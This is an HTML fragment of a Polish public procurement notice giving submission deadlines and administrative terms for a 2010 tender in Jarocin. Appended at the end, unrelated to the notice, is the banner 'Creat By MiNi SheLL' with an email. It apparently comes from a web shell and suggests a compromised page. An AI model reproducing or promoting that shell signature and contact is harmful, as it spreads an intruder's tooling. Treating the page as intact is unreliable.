<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jlajarocin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarociński Fundusz Poręczeń Kredytowych Sp. z o.o., ul. T. Kościuszki 15B, 63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2010 godzina 09:00, miejsce: Jarociński Fundusz Poręczeń Kredytowych Sp. z o.o., ul. T. Kościuszki 15B, 63-200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com